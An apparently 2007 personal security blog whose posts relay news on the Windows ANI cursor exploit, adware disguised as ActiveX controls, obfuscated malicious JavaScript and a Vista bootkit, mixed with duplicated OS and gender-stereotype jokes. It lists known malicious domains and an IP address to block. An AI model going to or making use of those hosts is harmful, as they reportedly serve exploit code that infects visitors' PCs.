Sunday, April 29, 2007
AntiSpy VS AntiSpy - AntiSpyware market news
Article link: http://reviews.cnet.com/4520-3513_7-6729554-1.html
Thursday, April 26, 2007
Found aternative tools for Antivirus protection.
There are many alternative protection tools are available to purchase or try for free.
Go ahead try test driving some of them.
They all claimed to be non signature type of Antivirus tools, but what happens when malware can bypass them?
o Signacert
o Robotgenius
o Cyberhawk
For home user visit Cyberhawk.
Go ahead try test driving some of them.
They all claimed to be non signature type of Antivirus tools, but what happens when malware can bypass them?
o Signacert
o Robotgenius
o Cyberhawk
For home user visit Cyberhawk.
Labels:
Aternative Antivirus,
Cyberhawk,
Robotgenius,
Signacert
Custom Packer ! Article "Packers, Packers, Packers for sale !"
Has anyone noticed that some of the malware are packed with some weird packers?
For detailed information visit Websense link.
I wish I can obtain this packer.. ;)
Tale of 2 ANI attacks
Check out the two very different continental ANI exploit from Websense.
Detailed explaination can be locate here.
Also see the map provided by Google on the report.
New approaches to malware detection coming into view
The major AV vendors like Symantec, McAfee & TrendMicro is seeking new ways to detect Malware or viruses.
Detailed article can be found here.
Detailed article can be found here.
JOKE! If Operating Systems Ran The Airlines...
Different operating systems. Different styles. But what if the quirks and styles of the different operating systems were applied to AIRLINES? What if airlines ran things the way operating systems do? This humorous analogy, applying operating system philosophies as if they were airlines, is a long-standing much-circulated amusing story, and we'd credit the author if we knew who wrote it!
If Operating Systems Ran The Airlines...
UNIX Airways
Everyone brings one piece of the plane along when they come to the airport. They all go out on the runway and put the plane together piece by piece, arguing non-stop about what kind of plane they are supposed to be building.
Air DOS
Everybody pushes the airplane until it glides, then they jump on and let the plane coast until it hits the ground again. Then they push again, jump on again, and so on...
Mac Airlines
All the stewards, captains, baggage handlers, and ticket agents look and act exactly the same. Every time you ask questions about details, you are gently but firmly told that you don't need to know, don't want to know, and everything will be done for you without your ever having to know, so just shut up.
Windows Air
The terminal is pretty and colourful, with friendly stewards, easy baggage check and boarding, and a smooth take-off. After about 10 minutes in the air, the plane explodes with no warning whatsoever.
Windows NT Air
Just like Windows Air, but costs more, uses much bigger planes, and takes out all the other aircraft within a 40-mile radius when it explodes.
Windows XP Air
You turn up at the airport,which is under contract to only allow XP Air planes. All the aircraft are identical, brightly coloured and three times as big as they need to be. The signs are huge and all point the same way. Whichever way you go, someone pops up dressed in a cloak and pointed hat insisting you follow him. Your luggage and clothes are taken off you and replaced with an XP Air suit and suitcase identical to everyone around you as this is included in the exorbitant ticket cost. The aircraft will not take off until you have signed a contract. The inflight entertainment promised turns out to be the same Mickey Mouse cartoon repeated over and over again. You have to phone your travel agent before you can have a meal or drink. You are searched regularly throughout the flight. If you go to the toilet twice or more you get charged for a new ticket. No matter what destination you booked you will always end up crash landing at Whistler in Canada.
OSX Air
You enter a white terminal, and all you can see is a woman sitting in the corner behind a white desk, you walk up to get your ticket. She smiles and says "Welcome to OS X Air, please allow us to take your picture", at which point a camera in the wall you didn't notice before takes your picture. "Thank you, here is your ticket" You are handed a minimalistic ticket with your picture at the top, it already has all of your information. A door opens to your right and you walk through. You enter a wide open space with one seat in the middle, you sit, listen to music and watch movies until the end of the flight. You never see any of the other passengers. You land, get off, and you say to yourself "wow, that was really nice, but I feel like something was missing"
Windows Vista Airlines
You enter a good looking terminal with the largest planes you have ever seen. Every 10 feet a security officer appears and asks you if you are "sure" you want to continue walking to your plane and if you would like to cancel. Not sure what cancel would do, you continue walking and ask the agent at the desk why the planes are so big. After the security officer making sure you want to ask the question and you want to hear the answer, the agent replies that they are bigger because it makes customers feel better, but the planes are designed to fly twice as slow. Adding the size helped achieve the slow fly goal.Once on the plane, every passenger has to be asked individually by the flight attendants if they are sure they want to take this flight. Then it is company policy that the captain asks the passengers collectively the same thing. After answering yes to so many questions, you are punched in the face by some stranger who when he asked "Are you sure you want me to punch you in the face? Cancel or Allow?" you instinctively say "Allow".After takeoff, the pilots realize that the landing gear driver wasn't updated to work with the new plane. Therefore it is always stuck in the down position. This forces the plane to fly even slower, but the pilots are used to it and continue to fly the planes, hoping that soon the landing gear manufacturer will give out a landing gear driver update.You arrive at your destination wishing you had used your reward miles with XP airlines rather than trying out this new carrier. A close friend, after hearing your story, mentions that Linux Air is a much better alternative and helps.
Linux Air
Disgruntled employees of all the other OS airlines decide to start their own airline. They build the planes, ticket counters, and pave the runways themselves. They charge a small fee to cover the cost of printing the ticket, but you can also download and print the ticket yourself.
When you board the plane, you are given a seat, four bolts, a wrench and a copy of the seat-HOWTO.html. Once settled, the fully adjustable seat is very comfortable, the plane leaves and arrives on time without a single problem, the in-flight meal is wonderful. You try to tell customers of the other airlines about the great trip, but all they can say is, "You had to do what with the seat?"
If Operating Systems Ran The Airlines...
UNIX Airways
Everyone brings one piece of the plane along when they come to the airport. They all go out on the runway and put the plane together piece by piece, arguing non-stop about what kind of plane they are supposed to be building.
Air DOS
Everybody pushes the airplane until it glides, then they jump on and let the plane coast until it hits the ground again. Then they push again, jump on again, and so on...
Mac Airlines
All the stewards, captains, baggage handlers, and ticket agents look and act exactly the same. Every time you ask questions about details, you are gently but firmly told that you don't need to know, don't want to know, and everything will be done for you without your ever having to know, so just shut up.
Windows Air
The terminal is pretty and colourful, with friendly stewards, easy baggage check and boarding, and a smooth take-off. After about 10 minutes in the air, the plane explodes with no warning whatsoever.
Windows NT Air
Just like Windows Air, but costs more, uses much bigger planes, and takes out all the other aircraft within a 40-mile radius when it explodes.
Windows XP Air
You turn up at the airport,which is under contract to only allow XP Air planes. All the aircraft are identical, brightly coloured and three times as big as they need to be. The signs are huge and all point the same way. Whichever way you go, someone pops up dressed in a cloak and pointed hat insisting you follow him. Your luggage and clothes are taken off you and replaced with an XP Air suit and suitcase identical to everyone around you as this is included in the exorbitant ticket cost. The aircraft will not take off until you have signed a contract. The inflight entertainment promised turns out to be the same Mickey Mouse cartoon repeated over and over again. You have to phone your travel agent before you can have a meal or drink. You are searched regularly throughout the flight. If you go to the toilet twice or more you get charged for a new ticket. No matter what destination you booked you will always end up crash landing at Whistler in Canada.
OSX Air
You enter a white terminal, and all you can see is a woman sitting in the corner behind a white desk, you walk up to get your ticket. She smiles and says "Welcome to OS X Air, please allow us to take your picture", at which point a camera in the wall you didn't notice before takes your picture. "Thank you, here is your ticket" You are handed a minimalistic ticket with your picture at the top, it already has all of your information. A door opens to your right and you walk through. You enter a wide open space with one seat in the middle, you sit, listen to music and watch movies until the end of the flight. You never see any of the other passengers. You land, get off, and you say to yourself "wow, that was really nice, but I feel like something was missing"
Windows Vista Airlines
You enter a good looking terminal with the largest planes you have ever seen. Every 10 feet a security officer appears and asks you if you are "sure" you want to continue walking to your plane and if you would like to cancel. Not sure what cancel would do, you continue walking and ask the agent at the desk why the planes are so big. After the security officer making sure you want to ask the question and you want to hear the answer, the agent replies that they are bigger because it makes customers feel better, but the planes are designed to fly twice as slow. Adding the size helped achieve the slow fly goal.Once on the plane, every passenger has to be asked individually by the flight attendants if they are sure they want to take this flight. Then it is company policy that the captain asks the passengers collectively the same thing. After answering yes to so many questions, you are punched in the face by some stranger who when he asked "Are you sure you want me to punch you in the face? Cancel or Allow?" you instinctively say "Allow".After takeoff, the pilots realize that the landing gear driver wasn't updated to work with the new plane. Therefore it is always stuck in the down position. This forces the plane to fly even slower, but the pilots are used to it and continue to fly the planes, hoping that soon the landing gear manufacturer will give out a landing gear driver update.You arrive at your destination wishing you had used your reward miles with XP airlines rather than trying out this new carrier. A close friend, after hearing your story, mentions that Linux Air is a much better alternative and helps.
Linux Air
Disgruntled employees of all the other OS airlines decide to start their own airline. They build the planes, ticket counters, and pave the runways themselves. They charge a small fee to cover the cost of printing the ticket, but you can also download and print the ticket yourself.
When you board the plane, you are given a seat, four bolts, a wrench and a copy of the seat-HOWTO.html. Once settled, the fully adjustable seat is very comfortable, the plane leaves and arrives on time without a single problem, the in-flight meal is wonderful. You try to tell customers of the other airlines about the great trip, but all they can say is, "You had to do what with the seat?"
JOKE! Micro$oft & Unix joke qoutes
To err is human, but to really foul things up requires a computer.
Any sufficiently advanced bug is indistinguishable from a feature.
The UNIX philosophy basically involves giving you enough rope to hang yourself. And then a couple of feet more, just to be sure.
Those parts of the system that you can hit with a hammer (not advised) are called hardware; those program instructions that you can only curse at are called software.
The difference between Microsoft and Jurassic Park?In one, a mad businessman makes a lot of money with beasts that should be extinct.The other is a film.
The gates in my computer are AND, OR and NOT; they are not Bill.
Nobody will ever need more than 640k RAM!?Bill Gates, 1981Windows 95 needs at least 8 MB RAM.?Bill Gates, 1996Nobody will ever need Windows 95.?Logical conclusion
Those who can't write, write manuals.
You have moved the mouse. NT must be restarted for the changes to take effect.
A computer without any MS Windows is like a fish without a bicycle.
UNIX is user friendly. It's just selective about who its friends are.
If all else fails, read the documentation.
Unix, MS-DOS, and Windows NT (also known as the Good, the Bad, and the Ugly).
Those who don't understand Unix are doomed to reinvent it, poorly.
You may not understand what I'm installing, but that's not my job. I just need to click Next, Next, Finish here so I can walk to the next system and repeat the process?
Gates' Law: Every 18 months, the speed of software halves.
MCSE == Minesweeper Consultant / Solitaire Expert
Press any key to continue, or any other key to cancel.
The only place for 63,000 bugs is a rain forest?
Of course I use Microsoft. Setting up a stable unix network is no challenge ;p
If the ancients were right and to think is to exist, does Microsoft exist?
The BeOS takes the best features from the major operating systems. It's got the power and flexibility of Unix, the interface and ease of use of the MacOS, and Minesweeper from Windows.
Everyone has a photographic memory. Some don't have film.
A Law of Computer Programming:Make it possible for programmers to write in English and you will find that programmers cannot write in English.
Mosher's Law of Software Engineering:Don't worry if it doesn't work right.If everything did, you'll be out of a job
Real programmers don't write in BASIC. Actually, no programmers write in BASIC after reaching puberty.
Premature optimization is the root of all evil.
Voodoo Programming: Things programmers do that they know shouldn't work but they try anyway, and which sometimes actually work, such as recompiling everything.
Eagleson's Law:Any code of your own that you haven't looked at for six or moremonths, might as well have been written by someone else.
A programming language that is sort of like Pascal except more likeassembly except that it isn't very much like either one, or anything else. It is either the best language available to the art today, or it isn't.
If the code and the comments disagree, then both are probably wrong.?
/* Halley */(Halley's comment.)
Never attribute to malloc that which can be adequately explained by stupidity.
C is a language that combines all the elegance and power of assembly language with all the readability and maintainability of assembly language.
If it wasn't for C, we'll be using BASI, PASAL and OBOL
99 little bugs in the code, 99 bugs in the code,fix one bug, compile it again?101 little bugs in the code?
#define QUESTION ((bb) !(bb)) /* Shakespeare */
Give a man a computer program and you give him a headache, but teach him to program computers and you give him the power to create headaches for others for the rest of his life?
Bus error - driver executed.
Any sufficiently advanced bug is indistinguishable from a feature.
The UNIX philosophy basically involves giving you enough rope to hang yourself. And then a couple of feet more, just to be sure.
Those parts of the system that you can hit with a hammer (not advised) are called hardware; those program instructions that you can only curse at are called software.
The difference between Microsoft and Jurassic Park?In one, a mad businessman makes a lot of money with beasts that should be extinct.The other is a film.
The gates in my computer are AND, OR and NOT; they are not Bill.
Nobody will ever need more than 640k RAM!?Bill Gates, 1981Windows 95 needs at least 8 MB RAM.?Bill Gates, 1996Nobody will ever need Windows 95.?Logical conclusion
Those who can't write, write manuals.
You have moved the mouse. NT must be restarted for the changes to take effect.
A computer without any MS Windows is like a fish without a bicycle.
UNIX is user friendly. It's just selective about who its friends are.
If all else fails, read the documentation.
Unix, MS-DOS, and Windows NT (also known as the Good, the Bad, and the Ugly).
Those who don't understand Unix are doomed to reinvent it, poorly.
You may not understand what I'm installing, but that's not my job. I just need to click Next, Next, Finish here so I can walk to the next system and repeat the process?
Gates' Law: Every 18 months, the speed of software halves.
MCSE == Minesweeper Consultant / Solitaire Expert
Press any key to continue, or any other key to cancel.
The only place for 63,000 bugs is a rain forest?
Of course I use Microsoft. Setting up a stable unix network is no challenge ;p
If the ancients were right and to think is to exist, does Microsoft exist?
The BeOS takes the best features from the major operating systems. It's got the power and flexibility of Unix, the interface and ease of use of the MacOS, and Minesweeper from Windows.
Everyone has a photographic memory. Some don't have film.
A Law of Computer Programming:Make it possible for programmers to write in English and you will find that programmers cannot write in English.
Mosher's Law of Software Engineering:Don't worry if it doesn't work right.If everything did, you'll be out of a job
Real programmers don't write in BASIC. Actually, no programmers write in BASIC after reaching puberty.
Premature optimization is the root of all evil.
Voodoo Programming: Things programmers do that they know shouldn't work but they try anyway, and which sometimes actually work, such as recompiling everything.
Eagleson's Law:Any code of your own that you haven't looked at for six or moremonths, might as well have been written by someone else.
A programming language that is sort of like Pascal except more likeassembly except that it isn't very much like either one, or anything else. It is either the best language available to the art today, or it isn't.
If the code and the comments disagree, then both are probably wrong.?
/* Halley */(Halley's comment.)
Never attribute to malloc that which can be adequately explained by stupidity.
C is a language that combines all the elegance and power of assembly language with all the readability and maintainability of assembly language.
If it wasn't for C, we'll be using BASI, PASAL and OBOL
99 little bugs in the code, 99 bugs in the code,fix one bug, compile it again?101 little bugs in the code?
#define QUESTION ((bb) !(bb)) /* Shakespeare */
Give a man a computer program and you give him a headache, but teach him to program computers and you give him the power to create headaches for others for the rest of his life?
Bus error - driver executed.
Wednesday, April 25, 2007
0wning Vista from the boot
Read full article from here.
Federico Biancuzzi interviews Nitin and Vipin Kumar, authors of VBootkit, a rootkit that is able to load from Windows Vista boot-sectors. They discuss the "features" of their code, the support of the various versions of Vista, the possibility to place it inside the BIOS (it needs around 1500 bytes), and the chance to use it to bypass Vista's product activation or avoid DRM.
Federico Biancuzzi interviews Nitin and Vipin Kumar, authors of VBootkit, a rootkit that is able to load from Windows Vista boot-sectors. They discuss the "features" of their code, the support of the various versions of Vista, the possibility to place it inside the BIOS (it needs around 1500 bytes), and the chance to use it to bypass Vista's product activation or avoid DRM.
MicroSoft's own detailed threats listing site!
Checkout MS's threat listing, wow are they going to be full Antivirus company?
http://www.microsoft.com/security/portal/
http://www.microsoft.com/security/portal/
JOKE! Some social mathematics for you
ROMANCE MATHEMATICS
Smart man + smart woman = romance
Smart man + dumb woman = affair
Dumb man + smart woman = marriage
Dumb man + dumb woman = pregnancy
`````````````````````````````````````
OFFICE ARITHMETIC
Smart boss + smart employee = profit
Smart boss + dumb employee = production
Dumb boss + smart employee = promotion
Dumb boss + dumb employee = overtime
```````````````````````````````````````
SHOPPING MATH
A man will pay $2 for a $1 item he needs.
A woman will pay $1 for a $2 item that she doesn't need.
``````````````````````````````````````````````````
GENERAL EQUATIONS & STATISTICS
A woman worries about the future until she gets a husband.
A man never worries about the future until he gets a wife.
A successful man is one who makes more money than his wife can spend.
A successful woman is one who can find such a man.
````````````````````````````````````````````````
HAPPINESS
To be happy with a man, you must understand him a lot and love him a little.
To be happy with a woman, you must love her a lot and not try to understand her at all.
`````````````````````````````````````````````````````````````````````````````
LONGEVITY
Married men live longer than single men do, but married men are a lot more willing to die.
``````````````````````````````````````````````````````````````````````````````
PROPENSITY TO CHANGE
woman marries a man expecting he will change, but he doesn't.A man marries a woman expecting that she won't change, and she does.
```````````````````````````````````````````````````````````````````````````````
DISCUSSION TECHNIQUE
A woman has the last word in any argument.Anything a man says after that is the beginning of a new argument.
````````````````````````````````````````````````````````````````````````````````
HOW TO STOP PEOPLE FROM BUGGING YOU ABOUT GETTING MARRIED
Old aunts used to come up to me at weddings, poking me in the ribs and cackling, telling me, "You're next." They stopped after I started doing the same thing to them at funerals.
Smart man + smart woman = romance
Smart man + dumb woman = affair
Dumb man + smart woman = marriage
Dumb man + dumb woman = pregnancy
`````````````````````````````````````
OFFICE ARITHMETIC
Smart boss + smart employee = profit
Smart boss + dumb employee = production
Dumb boss + smart employee = promotion
Dumb boss + dumb employee = overtime
```````````````````````````````````````
SHOPPING MATH
A man will pay $2 for a $1 item he needs.
A woman will pay $1 for a $2 item that she doesn't need.
``````````````````````````````````````````````````
GENERAL EQUATIONS & STATISTICS
A woman worries about the future until she gets a husband.
A man never worries about the future until he gets a wife.
A successful man is one who makes more money than his wife can spend.
A successful woman is one who can find such a man.
````````````````````````````````````````````````
HAPPINESS
To be happy with a man, you must understand him a lot and love him a little.
To be happy with a woman, you must love her a lot and not try to understand her at all.
`````````````````````````````````````````````````````````````````````````````
LONGEVITY
Married men live longer than single men do, but married men are a lot more willing to die.
``````````````````````````````````````````````````````````````````````````````
PROPENSITY TO CHANGE
woman marries a man expecting he will change, but he doesn't.A man marries a woman expecting that she won't change, and she does.
```````````````````````````````````````````````````````````````````````````````
DISCUSSION TECHNIQUE
A woman has the last word in any argument.Anything a man says after that is the beginning of a new argument.
````````````````````````````````````````````````````````````````````````````````
HOW TO STOP PEOPLE FROM BUGGING YOU ABOUT GETTING MARRIED
Old aunts used to come up to me at weddings, poking me in the ribs and cackling, telling me, "You're next." They stopped after I started doing the same thing to them at funerals.
Adware poses as ActiveX control
Article can be found here.
Security researchers have discovered samples of adware posing as ActiveX controls that allow voyeurs to watch online smut.
The ploy used by ImageAccesActiveXObject represents a new tactic in the battle to infect users' PCs, according to anti-virus firm Panda Software. The malware infects Windows PCs when users visit hacker-controlled websites posing as repositories of porn. When users visit these sites a window opens offering "erotic pictures". If the user agrees, another window informs that an ActiveX has to be installed. This control, however, is really the adware ImageAccesActiveXObject as demonstrated in a video produced by Panda on the threat.
document.write('\x3Cscript src="http://ad.uk.doubleclick.net/adj/reg.security.4159/antivirus;'+RegExCats+GetVCs()+'ptype='+RegPage+';maid='+maid+';pf='+RegPF+';dcove=d;test='+test+';sz=336x280;tile=3;ord=' + rand + '?" type="text/javascript">\x3C\/script>');
“Before now we had seen adware disguised as codecs to see videos, but never as ActiveX controls for viewing pictures. This is another strategy for tricking users. They think they are giving their consent to the installation of a legitimate tool when really they are allowing adware to be installed”, explained Luis Corrons, technical director of PandaLabs.
Once installed, the adware takes users to a page - which is currently unavailable - hosting smutty pictures. Meanwhile, malicious code is surreptitiously loaded onto compromised PCs. Among the sample of malware loaded onto PCs is SpyLocked, adware warning users that their computer is infected, and detectingImageAccesActiveXObject. The "scareware" posing as security software will not allow computers to be disinfected unless users register the product. ImageAccesActiveXObject also downloads the Securitytoolbar adware, which installs a toolbar and displays intrusive pop-up pages when users visit certain websites. ®
Security researchers have discovered samples of adware posing as ActiveX controls that allow voyeurs to watch online smut.
The ploy used by ImageAccesActiveXObject represents a new tactic in the battle to infect users' PCs, according to anti-virus firm Panda Software. The malware infects Windows PCs when users visit hacker-controlled websites posing as repositories of porn. When users visit these sites a window opens offering "erotic pictures". If the user agrees, another window informs that an ActiveX has to be installed. This control, however, is really the adware ImageAccesActiveXObject as demonstrated in a video produced by Panda on the threat.
document.write('\x3Cscript src="http://ad.uk.doubleclick.net/adj/reg.security.4159/antivirus;'+RegExCats+GetVCs()+'ptype='+RegPage+';maid='+maid+';pf='+RegPF+';dcove=d;test='+test+';sz=336x280;tile=3;ord=' + rand + '?" type="text/javascript">\x3C\/script>');
“Before now we had seen adware disguised as codecs to see videos, but never as ActiveX controls for viewing pictures. This is another strategy for tricking users. They think they are giving their consent to the installation of a legitimate tool when really they are allowing adware to be installed”, explained Luis Corrons, technical director of PandaLabs.
Once installed, the adware takes users to a page - which is currently unavailable - hosting smutty pictures. Meanwhile, malicious code is surreptitiously loaded onto compromised PCs. Among the sample of malware loaded onto PCs is SpyLocked, adware warning users that their computer is infected, and detectingImageAccesActiveXObject. The "scareware" posing as security software will not allow computers to be disinfected unless users register the product. ImageAccesActiveXObject also downloads the Securitytoolbar adware, which installs a toolbar and displays intrusive pop-up pages when users visit certain websites. ®
Webroot's disgrace action
Checkout the post messages as well!
http://sunbeltblog.blogspot.com/2007/04/this-is-just-weird.html
http://sunbeltblog.blogspot.com/2007/04/this-is-just-weird.html
Cybercrooks who rig Web sites to break into PCs are getting better at hiding their malicious code, a security expert say
Article can be found here.
VANCOUVER, B.C.--Cybercrooks who rig Web sites to break into PCs are getting better at hiding their malicious code, a security expert said Wednesday.
Increasingly the actual code, often JavaScript, used to attack PCs is hidden in Flash animations or scrambled so that anyone who examines the source of a page can't easily identify it, said Jose Nazario, a senior software engineer at Arbor Networks, in a presentation at the CanSecWest security confab here.
"Their obfuscation tools are primitive but effective," Nazario said. "They use obfuscation to avoid simple signatures," he said, referring to security techniques based on signatures to detect malicious Web sites. Signatures are fingerprints of known attacks.
Web attacks have become commonplace. Tens of thousands of Web sites attempt to install malicious code, according to StopBadware.org. The sites, the bulk of which are compromised sites, often drop a Trojan horse or other pest onto a PC through a security hole in the Web browser.
Many attacks use JavaScript. Initially miscreants used plain JavaScript in their attacks, but that has changed, Nazario said. He has spotted an encoded script function called "makemelaugh" that downloads a Trojan horse that captures bank information and a Paris Hilton Flash animation that installs a tool that makes a PC part of a botnet.
Attackers also are trying to outsmart security pros by programming malicious sites to load their malicious code only once on the same PC, Nazario said. Furthermore, a new toolkit called NeoSploit identifies the browser and is packed with security exploits to launch the proper attack, he said.
There are things security professionals can do to investigate attacks, Nazario said. "Bad guys are limited by the fact that JavaScript has to be decoded to be used by the browser. As long as you can analyze it outside the browser, you can figure out what it is going to do," he said.
The scrambled code can be made legible since it typically uses simple Base64 encoding for obfuscation and not actual encryption, Nazario said. He suggested NJS, SpiderMonkey and Rhino as tools to investigate script code. Flash files can be analyzed using a program called Flasm, he said.
Malicious JavaScript can be embedded in a Web page and will typically run without warning when the page is viewed in any ordinary browser. Attackers could try to lure you to their own, rigged Web site. But an attack could also lurk on a trusted Web site by exploiting a common flaw known as cross-site scripting.
To shield against malicious JavaScript, Web surfers can disable JavaScript, but that can impact the functionality of many Web sites. An alternative is to use security tools that have blacklists of known bad sites such as McAfee's SiteAdvisor or Google's Toolbar or Desktop software.
Another alternative is Exploit Prevention Labs' LinkScanner, which monitors traffic going into a PC and blocks known exploits.
VANCOUVER, B.C.--Cybercrooks who rig Web sites to break into PCs are getting better at hiding their malicious code, a security expert said Wednesday.
Increasingly the actual code, often JavaScript, used to attack PCs is hidden in Flash animations or scrambled so that anyone who examines the source of a page can't easily identify it, said Jose Nazario, a senior software engineer at Arbor Networks, in a presentation at the CanSecWest security confab here.
"Their obfuscation tools are primitive but effective," Nazario said. "They use obfuscation to avoid simple signatures," he said, referring to security techniques based on signatures to detect malicious Web sites. Signatures are fingerprints of known attacks.
Web attacks have become commonplace. Tens of thousands of Web sites attempt to install malicious code, according to StopBadware.org. The sites, the bulk of which are compromised sites, often drop a Trojan horse or other pest onto a PC through a security hole in the Web browser.
Many attacks use JavaScript. Initially miscreants used plain JavaScript in their attacks, but that has changed, Nazario said. He has spotted an encoded script function called "makemelaugh" that downloads a Trojan horse that captures bank information and a Paris Hilton Flash animation that installs a tool that makes a PC part of a botnet.
Attackers also are trying to outsmart security pros by programming malicious sites to load their malicious code only once on the same PC, Nazario said. Furthermore, a new toolkit called NeoSploit identifies the browser and is packed with security exploits to launch the proper attack, he said.
There are things security professionals can do to investigate attacks, Nazario said. "Bad guys are limited by the fact that JavaScript has to be decoded to be used by the browser. As long as you can analyze it outside the browser, you can figure out what it is going to do," he said.
The scrambled code can be made legible since it typically uses simple Base64 encoding for obfuscation and not actual encryption, Nazario said. He suggested NJS, SpiderMonkey and Rhino as tools to investigate script code. Flash files can be analyzed using a program called Flasm, he said.
Malicious JavaScript can be embedded in a Web page and will typically run without warning when the page is viewed in any ordinary browser. Attackers could try to lure you to their own, rigged Web site. But an attack could also lurk on a trusted Web site by exploiting a common flaw known as cross-site scripting.
To shield against malicious JavaScript, Web surfers can disable JavaScript, but that can impact the functionality of many Web sites. An alternative is to use security tools that have blacklists of known bad sites such as McAfee's SiteAdvisor or Google's Toolbar or Desktop software.
Another alternative is Exploit Prevention Labs' LinkScanner, which monitors traffic going into a PC and blocks known exploits.
Check out the TrendMicro answer to McAfee's SiteAdvisor
TrendMicro is following footstep of McAfee's popular SiteAdvisor.
Want to see their newest tool "TrendProtect"?
Here: Link
Want to see their newest tool "TrendProtect"?
Here: Link
Wednesday, April 11, 2007
Future Soldier - Robotcop look alike bodysuit
Check out cool Future Worrior's bodysuit, look just like from Robotcop movie.
Battlefiled 2025 style
Direct link: http://soldiermagazine.co.uk/mag/feature1.htm
* Super-strength soldiers
* Water-tight design
* Head start on the enemy
* Bullet-proof bootnecks
* Robo-Rangers
Monday, April 2, 2007
New threat - Windows's ANI exploit
Cnet security site is reporting Window's animated cursor exploit.
Direct link: http://reviews.cnet.com/4520-6600_7-6722377-1.html
If you happend to be received some spam emails with free Windows animated cursors attached, then do Not installs them! and run Windows update to obtain security patch from Microsoft.
Microsoft security pacth for animated cursor vulnerabilities Download link: here
From Cnet Security Center:-
Windows animated cursor attackThe way Microsoft Windows handles animated cursors on Web sites puts PCs at risk.By Robert Vamosi (March 30, 2007)(revised 4/2/07)
QUICK FACTS
Name: Windows animated cursor attack Date first reported: 03/29/07 CVE Number: CVE 2007-0038 Vulnerable software: Microsoft Windows 2000, SP1 through Windows Vista. What it does: Causes a denial of service attack (persistent reboot) or could allow remote access. Recommendations: Use an Internet browser other than Microsoft Internet Explorer, such as Firefox or Opera. Exploit code available: Yes Vendor patch available: Expected April 3, 2007.
8out of 10INTERNET THREAT RATINGHow we rate There's a new Microsoft Windows vulnerability being exploited across the Internet on over 100 Web sites, according to security vendor Websense. The vulnerability is caused by an unspecified error in the way Windows 2000, XP, and Vista handles animated cursors. Animated cursors allow a mouse pointer to appear animated on a Web site. The feature is often designated by the .ani suffix, but attacks for this vulnerability are not constrained by this file type so simply blocking .ani files won't necessarily protect a PC. Users need not do anything but visit a compromised site to become infected. Antivirus vendor F-Secure reports there's also a worm associated with this vulnerability.
Successful exploitation can result in memory corruption when processing cursors, animated cursors, and icons. According to Arbor Networks, the malicious code on compromised Web sites exploiting this flaw appears to be originating from the following sites, which you may want to block:
wsfgfdgrtyhgfd.net
85.255.113.4
uniq-soft.com
fdghewrtewrtyrew.biz
newasp.com.cn
To become infected, users must be using Internet Explorer 6 or 7; there is no need to click, just visiting an infected site is enough for an infection. The flaw does not affect Firefox or Opera Internet Browsers. Microsoft will release a patch on April 3, 2007. Until a patch is released, users should browse the Internet using a non-Internet Explorer browser. There is also a third-party (non-Microsoft) patch available here from the Zeroday Emergency Response Team (ZERT), however, this patch is offered "as is" and will need to be manually removed when Microsoft issues the official patch tomorrow.
Additional Resources
Microsoft: Advisory 935423
Zeroday Emergency Response Team (ZERT): Unofficial patch
NIST: CVE-2007-0038
Arbor Networks: Any Ani file could infect you
Websense: Alert
F-Secure: Blog post
Direct link: http://reviews.cnet.com/4520-6600_7-6722377-1.html
If you happend to be received some spam emails with free Windows animated cursors attached, then do Not installs them! and run Windows update to obtain security patch from Microsoft.
Microsoft security pacth for animated cursor vulnerabilities Download link: here
From Cnet Security Center:-
Windows animated cursor attackThe way Microsoft Windows handles animated cursors on Web sites puts PCs at risk.By Robert Vamosi (March 30, 2007)(revised 4/2/07)
QUICK FACTS
Name: Windows animated cursor attack Date first reported: 03/29/07 CVE Number: CVE 2007-0038 Vulnerable software: Microsoft Windows 2000, SP1 through Windows Vista. What it does: Causes a denial of service attack (persistent reboot) or could allow remote access. Recommendations: Use an Internet browser other than Microsoft Internet Explorer, such as Firefox or Opera. Exploit code available: Yes Vendor patch available: Expected April 3, 2007.
8out of 10INTERNET THREAT RATINGHow we rate There's a new Microsoft Windows vulnerability being exploited across the Internet on over 100 Web sites, according to security vendor Websense. The vulnerability is caused by an unspecified error in the way Windows 2000, XP, and Vista handles animated cursors. Animated cursors allow a mouse pointer to appear animated on a Web site. The feature is often designated by the .ani suffix, but attacks for this vulnerability are not constrained by this file type so simply blocking .ani files won't necessarily protect a PC. Users need not do anything but visit a compromised site to become infected. Antivirus vendor F-Secure reports there's also a worm associated with this vulnerability.
Successful exploitation can result in memory corruption when processing cursors, animated cursors, and icons. According to Arbor Networks, the malicious code on compromised Web sites exploiting this flaw appears to be originating from the following sites, which you may want to block:
wsfgfdgrtyhgfd.net
85.255.113.4
uniq-soft.com
fdghewrtewrtyrew.biz
newasp.com.cn
To become infected, users must be using Internet Explorer 6 or 7; there is no need to click, just visiting an infected site is enough for an infection. The flaw does not affect Firefox or Opera Internet Browsers. Microsoft will release a patch on April 3, 2007. Until a patch is released, users should browse the Internet using a non-Internet Explorer browser. There is also a third-party (non-Microsoft) patch available here from the Zeroday Emergency Response Team (ZERT), however, this patch is offered "as is" and will need to be manually removed when Microsoft issues the official patch tomorrow.
Additional Resources
Microsoft: Advisory 935423
Zeroday Emergency Response Team (ZERT): Unofficial patch
NIST: CVE-2007-0038
Arbor Networks: Any Ani file could infect you
Websense: Alert
F-Secure: Blog post
Subscribe to:
Posts (Atom)